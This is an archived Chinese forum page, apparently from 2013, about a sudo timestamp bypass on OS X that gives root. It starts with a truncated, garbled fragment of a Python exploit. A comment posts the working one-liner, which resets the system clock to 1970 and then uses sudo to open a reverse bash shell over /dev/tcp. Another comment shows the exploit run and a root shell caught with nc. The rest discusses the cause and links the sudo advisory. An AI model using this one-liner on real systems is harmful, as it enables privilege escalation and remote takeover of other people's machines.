OSX 2013-09-04 老系统内容 Root

  • A+
所属分类:lcx
#!/usr/bin/python 

# Original MSF Module: 
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb
 
###################################################################################################
 # Exploit Title: OSX & /dev/tcp/%s/%s 0>&1 &n" % (ipaddr,port))
 print """ 
############################################################### 
# 
# OSX 

[原文地址]

相关讨论:

1#

xsjswt | 2013-09-03 13:31

@xsser 为什么不发exploit那个领域

2#

xsjswt | 2013-09-03 13:32

systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo sunbash -i >& /dev/tcp/%s/%s 0>&1 &

3#

xsjswt | 2013-09-03 13:33

就这句就够了吧

4#

xsjswt | 2013-09-03 13:33

还有个2>&1,不然很多错误信息看不到

5#

xsser (十根阳具有长短!!) | 2013-09-03 13:38

ls -al /usr/sbin/systemsetup
-rwxr-xr-x  1 root  wheel  249360  7  8  2011 /usr/sbin/systemsetup

这个没有什么特别啊 为什么能够root呢

6#

123 (v2ex) | 2013-09-03 13:54

systemsetup是系统配置工具,但是这个需要admin权限才能运行,只是说绕过root密码执行操作

7#

xsser (十根阳具有长短!!) | 2013-09-03 14:04

@123 你没有回答问题啊 /usr/sbin/systemsetup 这个怎么会有root权限

8#感谢(1)

疯狗 (谁淫荡啊谁淫荡) | 2013-09-03 14:17

@xsjswt @123 @xsser

FengGou:Desktop $ ./root.py 
[*] Exploit has been performed. You should have a shell on ipaddr: 192.168.1.113 and port 8888

FengGou:~ $ nc -vvl 8888
bash: no job control in this shell
bash-3.2#
FengGou:Desktop $ sudo -k
FengGou:Desktop $ ./root.py 
[*] Exploit has been performed. You should have a shell on ipaddr: 192.168.1.113 and port 8888
FengGou:Desktop $ Password:
Password:
Password:

FengGou:~ $ nc -vvl 8888
bash: no job control in this shell
bash-3.2$

如果没猜错的话,这个exp是有个前提的,就是你最近sudo过,生成过用户认证时间戳文件,而且还在有效期内。

不关systemsetup的事,是sudo bin的漏洞。

PS:注意sudo -k

9#

疯狗 (谁淫荡啊谁淫荡) | 2013-09-03 14:22

k参数的man如下:

-k    When used by itself, the -k (kill) option to sudo invalidates the
      user's time stamp by setting the time on it to the Epoch.  The next
      time sudo is run a password will be required.  This option does not
      require a password and was added to allow a user to revoke sudo
      permissions from a .logout file.

      When used in conjunction with a command or an option that may require a
      password, the -k option will cause sudo to ignore the user's time stamp
      file.  As a result, sudo will prompt for a password (if one is required
      by sudoers) and will not update the user's time stamp file

更新时间错文件后,systemsetup将系统时间改成0,就是1970年第一天,触发这个sudo漏洞,我在看看CVE哈

10#

低调 | 2013-09-03 14:28

[b]厉害

11#

落叶纷飞 (im luoye,Once the 00day) | 2013-09-03 14:58

蛋疼。。。

12#

疯狗 (谁淫荡啊谁淫荡) | 2013-09-03 15:06

好了,找到官方公告了,一切尽在不言中

http://www.sudo.ws/sudo/alerts/epoch_ticket.html

13#

我勒个去 | 2013-09-03 15:13

@xsser 这是两个命令,BUG出在系统被设置为1970年这个时间,会导致sudo不要密码。

14#

xsjswt | 2013-09-03 16:20

@xsser @我勒个去 @疯狗 屌

15#

雨路 (迷你主机网- 免费PH空间www.mi-ni.ml) | 2013-09-03 16:25

上回日国外站的时候就遇到一台mac os的服务器

16#

Lenwood (r) | 2013-09-03 17:14

@疯狗 @xsser 既然在有效期内,明明直接sudo su - 就root了,爱咋咋地。再用systemsetup不是多此一举。

17#

xsser (十根阳具有长短!!) | 2013-09-03 18:20

@Lenwood 用system破坏这个有效期的机制

文章来源于lcx.cc:OSX

2013-09-04

老系统内容
Root

约 1111 字
预计阅读 3 分钟

相关推荐: 金融改革记录片(97% Owned)-97%被私人银行占据的无中生有债务货币

金融改革紀錄片97%owned中文字幕 「97% Owned展现出对於我们经济和金融体系严肃研究且可证实的证据。这是首部从英国观点对於此议题的记录片,并解释了中央银行以及金钱创造过程的内在运作。 当金钱驱动著几乎所有这颗星球上的所有活动时,重要的是我们要了解金…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: